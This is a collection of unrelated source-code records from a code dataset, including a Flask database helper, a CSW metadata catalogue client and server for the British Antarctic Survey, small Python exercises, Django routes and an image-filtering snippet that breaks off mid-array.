+{"seq_id":"72782482455","text":"from flask_app import db\nfrom flask_app import session_maker\nfrom flask_app import flask_app\nfrom sqlalchemy import Table, inspect\nfrom sqlalchemy.dialects.mysql import insert\n\norigin_point_system_config = Table(\n    'origin_point_system_config',\n    db.Model.metadata,\n    db.Column('origin_point', db.String(30), db.ForeignKey('origin_point_desc.tag_name', ondelete='CASCADE'), primary_key=True),\n    db.Column('system_config', db.Integer, db.ForeignKey('system_config.cid', ondelete='CASCADE'), primary_key=True)\n)\n\n\ndef clear_origin_point_system_table(unit):\n    db.reflect(app=flask_app)\n    db.get_engine().execute(\"SET foreign_key_checks = 0\")\n    db.get_engine().execute(f\"DELETE FROM {'origin_point_system_config'} WHERE origin_point in (select tag_name FROM origin_point_desc WHERE unit={unit});\")\n    db.get_engine().execute(\"SET foreign_key_checks = 1\")\n    return 'ok'\n\n\n# Constrain the link between origin_point_desc and point_desc via business logic; no constraint at the SQL level!!\n\ndef add_all(map_list):\n    with session_maker() as db_session:\n        db_session.add_all(map_list)\n        db_session.commit()\n    return \"ok\"\n\n\ndef add(relation_map):\n    with session_maker() as db_session:\n        db_session.add(relation_map)\n        db_session.commit()\n    return \"ok\"\n\n\ndef upsert_all(entity: type, records: list):\n    \"\"\"\n    Upsert multiple rows for the given entity in one go\n\n    Args:\n        entity (type): the entity class mapped to the table\n        records (list): the list of rows to upsert\n\n    Returns:\n        bool: whether the upsert succeeded\n    \"\"\"\n    # List of all primary key attribute names\n    primary_keys = [col.name for col in inspect(entity).primary_key]\n    # List of all column names\n    total_fields = inspect(entity).c.keys()\n    # Column names that need updating\n    update_keys = [key for key in total_fields if key not in primary_keys]\n    \n    insert_stmt = insert(entity).values(records)\n    \n    # Columns to update when the primary key already exists, i.e. every column except the primary keys\n    update_columns = {x.name: x for x in insert_stmt.inserted if x.name in update_keys}\n    # For many-to-many relation tables where all columns form a composite primary key: insert when absent, update all columns when present\n    if not len(update_columns):\n        update_columns = {x.name: x for x in insert_stmt.inserted if x.name in total_fields}\n    \n    upsert_stmt = insert_stmt.on_duplicate_key_update(**update_columns)\n    \n    db.session.execute(upsert_stmt)\n    db.session.commit()\n","repo_name":"G-AILab/PMS","sub_path":"flask_app/models/relation_map.py","file_name":"relation_map.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"26909422085","text":"from copy import deepcopy\nfrom enum import Enum\nfrom typing import List, Optional\n\n# noinspection PyPackageRequirements\n# Exempting Bandit security issue (Using Element to parse untrusted XML data is known to be vulnerable to XML attacks)\n#\n# We don't currently allow untrusted/user-provided XML so this is not a risk\nfrom lxml.etree import ElementTree, fromstring, XMLSyntaxError # nosec\nfrom flask import Request, Response\nfrom owslib.ows import ExceptionReport\nfrom owslib.util import ServiceException\nfrom pycsw.core import admin\nfrom owslib.csw import namespaces as csw_namespaces\nfrom requests import HTTPError\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import ProgrammingError\nfrom flask_azure_oauth import AzureToken\n\nfrom scar_add_metadata_toolbox.hazmat.csw import (\n CSWClient as _CSWClient,\n CSWServer as _CSWServer,\n convert_csw_brief_gmd_to_gmi_xml,\n CSWAuth,\n)\n\n\nclass CSWGetRecordMode(Enum):\n \"\"\"\n Represents the element set names used in the CSW specification\n \"\"\"\n\n FULL = \"full\"\n SUMMARY = \"summary\"\n BRIEF = \"brief\"\n\n\nclass CSWTransactionType(Enum):\n \"\"\"\n Represents the transaction types used in the CSW specification\n \"\"\"\n\n INSERT = \"insert\"\n UPDATE = \"update\"\n DELETE = \"delete\"\n\n\nclass CSWDatabaseAlreadyInitialisedException(Exception):\n \"\"\"\n Represents a situation whereby a CSW Server's backing database has already been initialised\n\n Backing databases must only be initialised once to avoid errors creating duplicate structures or unwanted side\n effects such as table truncation. If a database is initialised multiple times this role would be violated.\n \"\"\"\n\n pass\n\n\nclass CSWDatabaseNotInitialisedException(Exception):\n \"\"\"\n Represents a situation where the backing database for a CSW Server has not yet been initialised\n\n Backing databases must be initialised to ensure relevant database structures, indexes and triggers exist and are\n configured before records are written or read from a catalogue. If requests are made to a CSW server before has\n happened this rule would be violated. The relevant initialisation method can be ran to resolve this.\n \"\"\"\n\n pass\n\n\nclass CSWMethodNotSupportedException(Exception):\n \"\"\"\n Represents a situation where an unsupported HTTP method is used in a request to a CSW Server\n\n CSW requests must use the HEAD, GET or POST HTTP method. If another method is used this rule would be violated.\n \"\"\"\n\n pass\n\n\nclass CSWAuthException(Exception):\n \"\"\"\n Represents a situation where there the authentication information included in a CSW request causes an error\n\n This is a non-specific error and could indicate a range of situations, such as a token having expired or being\n malformed.\n \"\"\"\n\n pass\n\n\nclass CSWAuthMissingException(Exception):\n \"\"\"\n Represents a situation where authentication information is required for a CSW request but was not included\n\n Requests to authenticated CSW requests must include authentication information. If this is missing this rule would\n be violated.\n \"\"\"\n\n pass\n\n\nclass CSWAuthInsufficientException(Exception):\n \"\"\"\n Indicates a situation where the authorisation requirements for a CSW request are not satisfied by the information\n included in the request\n\n Requests to authorised CSW requests must include authorisation information that satisfies all the requirements of\n the resource or action being requested. 
If any of these requirements are not met this rule would be violated.\n\n    Typically this error relates to missing scopes/roles that are required by the resource or action being requested.\n    E.g. to publish a record the Publish scope/role is required.\n    \"\"\"\n\n    pass\n\n\nclass RecordServerException(Exception):\n    \"\"\"\n    Represents a situation where a record server encounters an error processing a request\n\n    This is a non-specific error and could indicate a range of situations, such as a record being malformed or an\n    internal error within the record server.\n    \"\"\"\n\n    pass\n\n\nclass RecordNotFoundException(Exception):\n    \"\"\"\n    Represents a situation where a given record does not exist\n    \"\"\"\n\n    pass\n\n\nclass RecordInsertConflictException(Exception):\n    \"\"\"\n    Represents a situation where a record to be inserted already exists in a repository\n\n    Records in repositories must be unique. If a record is inserted with the same identifier as an existing record,\n    neither record would be unique and this rule would be violated. Records may be updated instead.\n    \"\"\"\n\n    pass\n\n\nclass CSWServer:  # pragma: no cover (until #59 is resolved)\n    \"\"\"\n    Represents a CSW Server backed by PyCSW\n\n    This class is largely a wrapper around the PyCSW class in order to ease integrating CSW functionality within\n    a larger application, and to add additional functionality including:\n\n    * raising exceptions for errors\n    * support for token based authentication\n    * support for performing/reporting backing database initialisation\n    * simplifying PyCSW configuration options using a base configuration\n\n    Note: This class uses classes from the Hazardous Materials module. This is to work around limitations in the PyCSW\n    package. This will be addressed by upstreaming missing functionality or creating a derivative package.\n    \"\"\"\n\n    base_configuration = {\n        \"server\": {\n            \"url\": None,\n            \"mimetype\": \"application/xml; charset=UTF-8\",\n            \"encoding\": \"UTF-8\",\n            \"language\": \"en-GB\",\n            \"maxrecords\": \"100\",\n            \"loglevel\": \"DEBUG\",\n            \"logfile\": \"/dev/null\",\n            \"pretty_print\": \"true\",\n            \"gzip_compresslevel\": \"8\",\n            \"domainquerytype\": \"list\",\n            \"domaincounts\": \"false\",\n            \"profiles\": \"apiso\",\n        },\n        \"manager\": {\n            \"transactions\": \"true\",\n            \"allowed_ips\": \"*.*.*.*\",\n        },\n        \"metadata:main\": {\n            \"identification_title\": \"Internal CSW (Published)\",\n            \"identification_abstract\": \"Internal PyCSW OGC CSW server for published records\",\n            \"identification_keywords\": \"catalogue, discovery, metadata\",\n            \"identification_keywords_type\": \"theme\",\n            \"identification_fees\": \"None\",\n            \"identification_accessconstraints\": \"None\",\n            \"provider_name\": \"British Antarctic Survey\",\n            \"provider_url\": \"https://www.bas.ac.uk/\",\n            \"contact_name\": \"Mapping and Geographic Information Centre, British Antarctic Survey\",\n            \"contact_position\": \"Technical Contact\",\n            \"contact_address\": \"British Antarctic Survey, Madingley Road, High Cross\",\n            \"contact_city\": \"Cambridge\",\n            \"contact_stateorprovince\": \"Cambridgeshire\",\n            \"contact_postalcode\": \"CB30ET\",\n            \"contact_country\": \"United Kingdom\",\n            \"contact_phone\": \"+44(0) 1223 221400\",\n            \"contact_email\": \"magic@bas.ac.uk\",\n            \"contact_url\": \"https://www.bas.ac.uk/team/magic\",\n            \"contact_hours\": \"09:00 - 17:00\",\n            \"contact_instructions\": \"During hours of service on weekdays. 
Best efforts support only.\",\n \"contact_role\": \"pointOfContact\",\n },\n \"repository\": {\"database\": None, \"table\": None},\n \"metadata:inspire\": {\n \"enabled\": \"true\",\n \"languages_supported\": \"eng\",\n \"default_language\": \"eng\",\n \"date\": \"YYYY-MM-DD\",\n \"gemet_keywords\": \"Utility and governmental services\",\n \"conformity_service\": \"notEvaluated\",\n \"contact_name\": \"Mapping and Geographic Information Centre, British Antarctic Survey\",\n \"contact_email\": \"magic@bas.ac.uk\",\n \"temp_extent\": \"YYYY-MM-DD/YYYY-MM-DD\",\n },\n }\n\n def __init__(self, config: dict):\n \"\"\"\n Configuration dict must include:\n\n * endpoint: URL clients will use for access (str)\n * title: catalogue title (str)\n * abstract: catalogue description (str)\n * database_connection_string: PyCSW (SQL Alchemy) connection string (must use PostgreSQL)\n * database_table_table: name of table for storing records (str)\n * auth_required_scopes_read: OAuth scopes required to make record(s) requests (may be empty list)\n * auth_required_scopes_write: OAuth scopes required to make transactional requests (may be empty list)\n\n Other PyCSW configuration options may not be changed.\n\n :type config dict\n :param config: PyCSW config subset\n \"\"\"\n _csw_options = deepcopy(self.base_configuration)\n if \"endpoint\" in config.keys():\n _csw_options[\"server\"][\"url\"] = config[\"endpoint\"]\n if \"title\" in config.keys():\n _csw_options[\"metadata:main\"][\"identification_title\"] = config[\"title\"]\n if \"abstract\" in config.keys():\n _csw_options[\"metadata:main\"][\"identification_abstract\"] = config[\"abstract\"]\n if \"database_connection_string\" in config.keys():\n _csw_options[\"repository\"][\"database\"] = config[\"database_connection_string\"]\n if \"database_table\" in config.keys():\n _csw_options[\"repository\"][\"table\"] = config[\"database_table\"]\n\n self._csw_config = _csw_options\n self._csw_auth = {\"read\": config[\"auth_required_scopes_read\"], \"write\": config[\"auth_required_scopes_write\"]}\n\n @property\n def _is_initialised(self) -> bool:\n \"\"\"\n Tests whether the backing database has been initialised for catalogue\n\n Checks whether records table used for the catalogue exists, if yes it is assumed to have been initialised.\n\n :rtype bool\n :return: whether the backing database has been initialised\n \"\"\"\n csw_database = create_engine(self._csw_config[\"repository\"][\"database\"])\n return csw_database.dialect.has_table(csw_database, self._csw_config[\"repository\"][\"table\"])\n\n def _check_auth(self, method: str, token: Optional[AzureToken]) -> None:\n \"\"\"\n Checks whether an authorisation token contains all of a required set of scopes\n\n I.e. 
is the client allowed to perform the action they're trying to do.\n\n Currently actions are simplified to 'read' or 'write' and the required set of scopes is specified by the\n 'auth_required_scopes_read' or 'auth_required_scopes_write' class config options.\n\n If the token does not include the required scopes an exception is raised, otherwise nothing is returned.\n\n :type method str\n :param method: either 'read' or 'write'\n :type token AzureToken\n :param token: request authorisation token\n \"\"\"\n try:\n if len(self._csw_auth[method]) > 0 and not token.scopes.issuperset(set(self._csw_auth[method])):\n raise CSWAuthInsufficientException()\n except AttributeError:\n # noinspection PyComparisonWithNone\n if token == None:\n raise CSWAuthMissingException()\n\n def setup(self) -> None:\n \"\"\"\n Initialises the backing database for the catalogue\n\n Convenience method to call the PyCSW admin task for setting up the required database components (tables,\n indexes, triggers, etc.)\n\n Note: There are currently limitations with using multiple catalogues within one schema. The specific errors\n this causes (which are not fatal) are detected by this method and treated as a false positive. See the project\n README for more information.\n \"\"\"\n if self._is_initialised:\n raise CSWDatabaseAlreadyInitialisedException()\n\n csw_database = create_engine(self._csw_config[\"repository\"][\"database\"])\n csw_database.execute(\"SELECT version();\")\n\n try:\n admin.setup_db(\n database=self._csw_config[\"repository\"][\"database\"],\n table=self._csw_config[\"repository\"][\"table\"],\n home=None,\n )\n except ProgrammingError as e:\n # Ignore errors related to PyCSW's limitations with non-namespaced indexes\n if 'ERROR: relation \"fts_gin_idx\" already exists' not in e.orig.pgerror:\n raise CSWDatabaseAlreadyInitialisedException()\n pass\n\n def process_request(self, request: Request, token: Optional[AzureToken] = None) -> Response:\n \"\"\"\n Process a CSW request and return a suitable response\n\n Represents embedding CSW by processing an incoming Flask/HTTP request into a CSW request and returning the CSW\n response as a Flask/HTTP response.\n\n In addition this method:\n\n * implements authorisation checks for reading records and using the transactional profile\n * supports HEAD requests by treating them as GET requests and discarding the response body\n\n :type request Request\n :param request: Flask HTTP request\n :type token AzureToken\n :param token: request authorisation token\n :rtype Response\n :return: Flask HTTP response\n \"\"\"\n if not self._is_initialised:\n raise CSWDatabaseNotInitialisedException()\n\n if request.method != \"HEAD\" and request.method != \"GET\" and request.method != \"POST\":\n raise CSWMethodNotSupportedException()\n\n _csw = _CSWServer(rtconfig=self._csw_config, env=request.environ, version=\"2.0.2\")\n _csw.requesttype = \"GET\"\n _csw.kvp = request.args.to_dict()\n _request_type = \"inspect\"\n\n if request.method == \"POST\":\n _request_type = \"read\"\n _csw.requesttype = \"POST\"\n _csw.request = request.data\n\n request_xml = ElementTree(fromstring(_csw.request))\n if len(request_xml.xpath(\"/csw:Transaction/csw:Insert\", namespaces=csw_namespaces)) > 0:\n _request_type = \"create\"\n elif len(request_xml.xpath(\"/csw:Transaction/csw:Update\", namespaces=csw_namespaces)) > 0:\n _request_type = \"update\"\n elif len(request_xml.xpath(\"/csw:Transaction/csw:Delete\", namespaces=csw_namespaces)) > 0:\n _request_type = \"delete\"\n\n if _request_type == 
\"read\":\n self._check_auth(method=\"read\", token=token)\n elif _request_type == \"create\" or _request_type == \"update\" or _request_type == \"delete\":\n self._check_auth(method=\"write\", token=token)\n\n status_code, response = _csw.dispatch()\n\n if request.method == \"HEAD\":\n return Response(status=status_code)\n\n return Response(response=response, status=status_code, content_type=_csw.contenttype)\n\n\nclass CSWClient: # pragma: no cover (until #59 is resolved)\n \"\"\"\n Represents a CSW Client backed by OWSLib\n\n This class is largely a wrapper around the OWSLib CSW class in order to abstract away CSW or OWSLib specific\n details (such as needing to known to use the `getRecords2` method for example).\n\n Other features include:\n * raising exceptions for errors\n * support for token based authentication\n * workaround to fix transactional update results count error\n * compatibility with this applications CSWServer class for error handling\n * compatibility with this applications Repository class for setting CSW configuration options\n\n Note: This class uses classes from the Hazardous Materials module. This is to work around limitations in the OWSLib\n package. This will be addressed by upstreaming missing functionality or creating a derivative package.\n \"\"\"\n\n def __init__(self, config: dict):\n \"\"\"\n Configuration dict must include:\n\n * endpoint: URL to CSW service (str)\n * auth: parameters for CSW authentication object (may be empty dict)\n\n Other OWSLib configuration options may also be included.\n\n :type config: dict\n :param config: CSW (OWSLib) configuration options\n \"\"\"\n self._csw_config = config\n self._csw_endpoint = config[\"endpoint\"]\n self._csw_auth = CSWAuth(**config[\"auth\"])\n del self._csw_config[\"endpoint\"]\n del self._csw_config[\"auth\"]\n\n def __repr__(self):\n return f\"\"\n\n def _get_client(self) -> _CSWClient:\n \"\"\"\n Creates a OWSLib CSW client instance\n\n A separate CSW instance is used for each action (read/transaction), rather using a class instance singleton, as\n OWSLib will attempt to retrieve the CSW GetCapabilities response on instantiation. This behaviour can result in\n errors where CSW endpoints may not yet exist for example.\n\n Due to the behaviour of OWSLib, auth errors emanating from the Flask Azure OAuth provider (used to secure CSW\n server instances) trigger a ServiceException before the relevant action is taken, and so must be caught here.\n\n Note: This method currently uses a modified class from the hazardous materials classes.\n\n :rtype CatalogueServiceWeb\n :return: OWSLib CSW client (modified)\n \"\"\"\n try:\n return _CSWClient(self._csw_endpoint, auth=self._csw_auth, **self._csw_config)\n except ServiceException:\n raise CSWAuthException()\n\n def get_record(self, identifier: str, mode: CSWGetRecordMode = CSWGetRecordMode.FULL) -> str:\n \"\"\"\n Return a single record\n\n CSW supports returning full/complete records or summary versions with more specific elements. Formally CSW\n refers to these as Element Set Names, this method refers to this as the (record) mode. 
Options are described by\n        the CSWGetRecordMode enumeration.\n\n        Note: If 'brief' records are requested, a fixer method from the hazardous materials classes is used.\n\n        :type identifier str\n        :param identifier: ISO 19115 file identifier\n        :type mode CSWGetRecordMode\n        :param mode: CSW record mode (element set name)\n        :rtype str\n        :return: ISO 19115-2 record encoded as an XML string\n        \"\"\"\n        _csw = self._get_client()\n        try:\n            _csw.getrecordbyid(id=[identifier], esn=mode.value, outputschema=\"http://www.isotc211.org/2005/gmd\")\n            if len(_csw.records) != 1:\n                raise RecordNotFoundException()\n            return _csw.records[identifier].xml.decode()\n        except HTTPError as e:\n            if e.response.content.decode() == \"Catalogue not yet available.\":\n                raise CSWDatabaseNotInitialisedException()\n            raise HTTPError(e)\n        except XMLSyntaxError:\n            if _csw.response.decode() == \"Missing authorisation token.\":\n                raise CSWAuthMissingException()\n            elif _csw.response.decode() == \"Insufficient authorisation token.\":\n                raise CSWAuthInsufficientException()\n\n    def get_records(self, mode: CSWGetRecordMode = CSWGetRecordMode.FULL) -> List[str]:\n        \"\"\"\n        Return all records\n\n        Currently returns all records in a CSW catalogue, i.e. search/filtering options are not yet supported.\n\n        CSW supports returning full/complete records or summary versions with more specific elements. Formally CSW\n        refers to these as Element Set Names; this method refers to this as the (record) mode. Options are described by\n        the CSWGetRecordMode enumeration.\n\n        Note: If 'brief' records are requested, a fixer method from the hazardous materials classes is used.\n\n        :type mode CSWGetRecordMode\n        :param mode: CSW record mode (element set name)\n        :rtype list\n        :return: list of ISO 19115-2 records encoded as XML strings\n        \"\"\"\n        _csw = self._get_client()\n        try:\n            _csw.getrecords2(\n                typenames=\"gmd:MD_Metadata\",\n                esn=mode.value,\n                resulttype=\"results\",\n                outputschema=\"http://www.isotc211.org/2005/gmd\",\n                maxrecords=100,\n            )\n            for raw_record in _csw.records.values():\n                if isinstance(raw_record.xml, bytes):\n                    raw_record.xml = raw_record.xml.decode()\n                if mode == CSWGetRecordMode.BRIEF:\n                    raw_record.xml = convert_csw_brief_gmd_to_gmi_xml(record_xml=raw_record.xml)\n                yield raw_record.xml\n        except HTTPError as e:\n            if e.response.content.decode() == \"Catalogue not yet available.\":\n                raise CSWDatabaseNotInitialisedException()\n        except XMLSyntaxError:\n            if _csw.response.decode() == \"Missing authorisation token.\":\n                raise CSWAuthMissingException()\n            elif _csw.response.decode() == \"Insufficient authorisation token.\":\n                raise CSWAuthInsufficientException()\n\n    def insert_record(self, record: str) -> None:\n        \"\"\"\n        Inserts a new record\n\n        Uses the CSW transactional profile to insert a new record into a CSW catalogue.\n\n        Note: If a record with the same ISO 19115 file identifier exists it will be considered a duplicate of an\n        existing record and result in a conflict error. 
To update an existing record, including changing its file\n        identifier, use the `update_record()` method.\n\n        :type record str\n        :param record: ISO 19115-2 record encoded as an XML string\n        \"\"\"\n        _csw = self._get_client()\n        try:\n            _csw.transaction(ttype=CSWTransactionType.INSERT.value, typename=\"gmd:MD_Metadata\", record=record)\n            if len(_csw.results[\"insertresults\"]) != 1:\n                raise RecordServerException()\n        except ExceptionReport:\n            raise RecordInsertConflictException()\n        except HTTPError as e:\n            if e.response.content.decode() == \"Catalogue not yet available.\":\n                raise CSWDatabaseNotInitialisedException()\n        except XMLSyntaxError:\n            if _csw.response.decode() == \"Missing authorisation token.\":\n                raise CSWAuthMissingException()\n            elif _csw.response.decode() == \"Insufficient authorisation token.\":\n                raise CSWAuthInsufficientException()\n\n    def update_record(self, record: str) -> None:\n        \"\"\"\n        Updates an existing record\n\n        Uses the CSW transactional profile to update an existing record in a CSW catalogue.\n\n        This method requires complete/replacement records; partial record updates are not supported.\n\n        :type record str\n        :param record: ISO 19115-2 record encoded as an XML string\n        \"\"\"\n        _csw = self._get_client()\n        try:\n            _csw.transaction(ttype=CSWTransactionType.UPDATE.value, typename=\"gmd:MD_Metadata\", record=record)\n            # Workaround for https://github.com/geopython/OWSLib/issues/678\n            _csw.results[\"updated\"] = int(\n                ElementTree(fromstring(_csw.response)).xpath(\n                    \"/csw:TransactionResponse/csw:TransactionSummary/csw:totalUpdated/text()\",\n                    namespaces=csw_namespaces,\n                )[0]\n            )\n            if _csw.results[\"updated\"] != 1:\n                raise RecordServerException()\n        except HTTPError as e:\n            if e.response.content.decode() == \"Catalogue not yet available.\":\n                raise CSWDatabaseNotInitialisedException()\n        except XMLSyntaxError:\n            if _csw.response.decode() == \"Missing authorisation token.\":\n                raise CSWAuthMissingException()\n            elif _csw.response.decode() == \"Insufficient authorisation token.\":\n                raise CSWAuthInsufficientException()\n\n    def delete_record(self, identifier: str) -> None:\n        \"\"\"\n        Deletes an existing record\n\n        Uses the CSW transactional profile to delete an existing record from a CSW catalogue.\n\n        :type identifier str\n        :param identifier: ISO 19115 file identifier\n        \"\"\"\n        _csw = self._get_client()\n        try:\n            _csw.transaction(ttype=CSWTransactionType.DELETE.value, identifier=identifier)\n            _csw.results[\"deleted\"] = int(\n                ElementTree(fromstring(_csw.response)).xpath(\n                    \"/csw:TransactionResponse/csw:TransactionSummary/csw:totalDeleted/text()\",\n                    namespaces=csw_namespaces,\n                )[0]\n            )\n            # noinspection PyTypeChecker\n            if _csw.results[\"deleted\"] != 1:\n                raise RecordServerException()\n        except HTTPError as e:\n            if e.response.content.decode() == \"Catalogue not yet available.\":\n                raise CSWDatabaseNotInitialisedException()\n        except XMLSyntaxError:\n            if _csw.response.decode() == \"Missing authorisation token.\":\n                raise CSWAuthMissingException()\n            elif _csw.response.decode() == \"Insufficient authorisation token.\":\n                raise CSWAuthInsufficientException()\n","repo_name":"antarctica/scar-add-metadata-toolbox","sub_path":"scar_add_metadata_toolbox/csw.py","file_name":"csw.py","file_ext":"py","file_size_in_byte":24891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"70766158618","text":"import random\n\nf_out = open('out.txt', 'w')\n\nf_out.write(\"\"\"CONNECT '.../students.fdb'\n\nCREATE TABLE marks(\n    id INTEGER,\n    
student_id INTEGER,\n    subject_id INTEGER,\n    mark INTEGER\n);\n\n\"\"\")\n\nsubject_id = 1\nid = 1\nfor student_id in range(1, 101):\n    for c in range(0, 30, 5):\n        f_out.write(\"INSERT INTO marks VALUES(%d, %d, %d, %d);\\n\" % (id, student_id, subject_id + c, random.randint(1, 10)))\n        id += 1\n    subject_id = subject_id + 1 if subject_id < 5 else 1\n","repo_name":"LuckThemAll/DB","sub_path":"StudentsDB/generators/marks generator.py","file_name":"marks generator.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"37032946698","text":"from typing import Optional\n\n\nclass AnilistComicInfo:\n    def __init__(\n        self,\n        tracker_id: int,\n        title: str,  # userPreferred\n        manga_format: str,  # format\n        status: str,\n        description: str,\n        country_of_origin: str,\n        original_source: str,\n        genres: [str],\n        writer: Optional[str],\n        penciller: Optional[str],\n        inker: Optional[str],\n        synonyms: [str],\n        is_adult: bool,\n        site_url: str,\n        chapters: Optional[int],  # Chapters is null if it is an ongoing series\n        volumes: Optional[int],  # Volumes is null if ongoing\n        tags: [str]\n    ):\n        self.tracker_id = tracker_id\n\n        self.title = title\n        self.altTitles = synonyms\n        self.summary = description\n        self.genres = \", \".join(genres+tags)\n\n        self.status = status.lower()\n        self.format = manga_format.lower().replace(\"_\", \" \")\n        self.country_of_origin = country_of_origin\n        self.original_source = original_source.lower()\n\n        if is_adult:\n            self.age_rating = \"Adults Only 18+\"\n        else:\n            self.age_rating = \"G\"\n\n        if writer == \"\":\n            self.writer = None\n        else:\n            self.writer = writer\n\n        if penciller == \"\":\n            self.penciller = None\n        else:\n            self.penciller = penciller\n\n        if inker == \"\":\n            self.inker = None\n        else:\n            self.inker = inker\n\n        self.chapters = chapters\n        self.volumes = volumes\n\n        self.site_url = site_url\n        self.scan_information = \"\"\n","repo_name":"curche/MangaManage","sub_path":"models/anilistToComicInfo.py","file_name":"anilistToComicInfo.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"68"}
+{"seq_id":"12338162964","text":"# Welcome to my list project\r\n    # List 1: boys' names\r\nboys_name_list = [\"Mani\", \"Mohammad\", \"Ali\", \"Amir Hossein\", \"Hossein\", \"Abolfazl\", \"Amir Abbas\", \"Samiyar\", \"Mohammad Taha\", \"Mohammad Reza\"]\r\nfor boys_name in boys_name_list :\r\n    print ( boys_name )\r\n\r\n\r\n# List 2: animal names\r\nanimals_list = [\"Lion\", \"Tiger\", \"Elephant\", \"Giraffe\", \"Dolphin\", \"Panda\", \"Kangaroo\", \"Zebra\", \"Cheetah\", \"Penguin\"]\r\nfor animals in animals_list :\r\n    print ( animals )\r\n\r\n\r\n# List 3: city names\r\ncities_list = [\"New York\", \"Los Angeles\", \"Paris\", \"Tokyo\", \"London\", \"Sydney\", \"Dubai\", \"Rome\", \"Berlin\", \"Moscow\"]\r\nfor cities in cities_list :\r\n    print ( cities )\r\n\r\n\r\n# List 4: fruit names\r\nfruits_list = [\"Apple\", \"Banana\", \"Orange\", \"Grapes\", \"Strawberry\", \"Watermelon\", \"Mango\", \"Pineapple\", \"Cherry\", \"Kiwi\"]\r\nfor fruits in fruits_list :\r\n    print ( fruits )\r\n\r\n\r\n# List 5: color names\r\ncolors_list = [\"Red\", \"Blue\", \"Green\", \"Yellow\", \"Purple\", \"Orange\", \"Pink\", \"Brown\", \"Black\", \"White\"]\r\nfor colors in colors_list :\r\n    print ( colors )\r\n\r\n\r\n# List 6: sports names\r\nsports_list = [\"Football\", \"Basketball\", \"Tennis\", \"Soccer\", \"Golf\", 
\"Swimming\", \"Cricket\", \"Baseball\", \"Volleyball\", \"Hockey\"]\r\nfor sports in sports_list :\r\n print ( sports )\r\n\r\n\r\n# لیست هفتم: نام‌های میهن‌ها\r\ncountries_list = [\"Iran\", \"USA\", \"France\", \"Japan\", \"UK\", \"Australia\", \"UAE\", \"Italy\", \"Germany\", \"Russia\"]\r\nfor countries in countries_list :\r\n print ( countries )\r\n\r\n\r\n# لیست هشتم: نام‌های اساتید\r\nteachers_list = [\"Professor Smith\", \"Dr. Johnson\", \"Professor Lee\", \"Dr. Clark\", \"Professor Brown\", \"Dr. Wilson\", \"Professor Taylor\", \"Dr. Anderson\", \"Professor Harris\", \"Dr. Martin\"]\r\nfor teachers in teachers_list :\r\n print ( teachers )\r\n\r\n\r\n\r\n\r\n# لیست نهم: نام‌های ماه‌های سال\r\nmonths_list = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\"]\r\nfor months in months_list :\r\n print ( months )\r\n\r\n\r\n\r\n# لیست دهم: نام‌های ماشین‌ها\r\ncars_list = [\"Toyota\", \"Honda\", \"Ford\", \"Chevrolet\", \"Nissan\", \"BMW\", \"Mercedes-Benz\", \"Audi\", \"Lexus\", \"Tesla\"]\r\nfor cars in cars_list:\r\n print ( cars ) \r\n\r\n\r\n","repo_name":"salehmorovat/my-list","sub_path":"my_list.py","file_name":"my_list.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42279998821","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom monitoring.views import HumiditySampleViewSet, PlantViewSet, get_humidity\n\n\nrouter = DefaultRouter()\nrouter.register('humidity', HumiditySampleViewSet)\nrouter.register('plant', PlantViewSet)\n\nurlpatterns = [\n path('', include(router.urls)),\n path('humiditySamples/', get_humidity),\n]\n","repo_name":"matfij/watering-system-api","sub_path":"api/monitoring/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"86400860256","text":"import numpy as np\nfrom risk.dice import roll_dice\n\n\ndef test_roll_dice():\n for i in range(10):\n results = roll_dice(i)\n assert len(results) == i\n assert all([r > 0 and r < 7 for r in results])\n\n\ndef test_seed():\n np.random.seed(0)\n assert list(roll_dice(3)) == [5, 6, 1]\n","repo_name":"alexdawn/risk","sub_path":"tests/test_dice.py","file_name":"test_dice.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74228476697","text":"\"\"\"\nYou are given a two-dimensional integer matrix of 1s and 0s. A 1 represents land and 0 represents water, so an island is a group of 1s that are neighboring whose perimeter is surrounded by water. 
You can assume that the edges of the matrix are surrounded by water.\n\nReturn the area of the largest island in the matrix.\nLeetcode: https://leetcode.com/problems/max-area-of-island/\n\"\"\"\nclass Solution:\n \n def dfs(self, grid, r, c):\n grid[r][c] = 0\n num = 1\n lst = [(r-1, c), (r+1, c), (r, c-1), (r, c+1)]\n for row, col in lst:\n if row >= 0 and col >= 0 and row < len(grid) and col < len(grid[0]) and grid[row][col] == 1:\n num += self.dfs(grid, row, col)\n return num\n \n \n def maxAreaOfIsland(self, grid):\n area_islands = 0\n for r in range(len(grid)):\n for c in range(len(grid[0])):\n if grid[r][c] == 1:\n area_islands = max(area_islands, self.dfs(grid, r, c))\n return area_islands","repo_name":"d-jeph/CodeChallenges","sub_path":"maxAreaIsland.py","file_name":"maxAreaIsland.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15349104050","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy import signal as sg\n\nimg = cv2.imread('oko01.png', 0)\n\n\ndef filtration(img, matrix):\n if img.ndim == 2:\n return sg.convolve2d(img, matrix[:, ::-1], \"valid\").astype(\"uint8\")\n if img.ndim == 3:\n res_lst = [sg.convolve2d(img[:, :, x], matrix[:, ::-1], \"valid\") for x in range(img.shape[2])]\n return np.rollaxis(np.array(res_lst), 0, 3).astype(\"uint8\")\n\n\ngauss_matrix = np.array([[0.037, 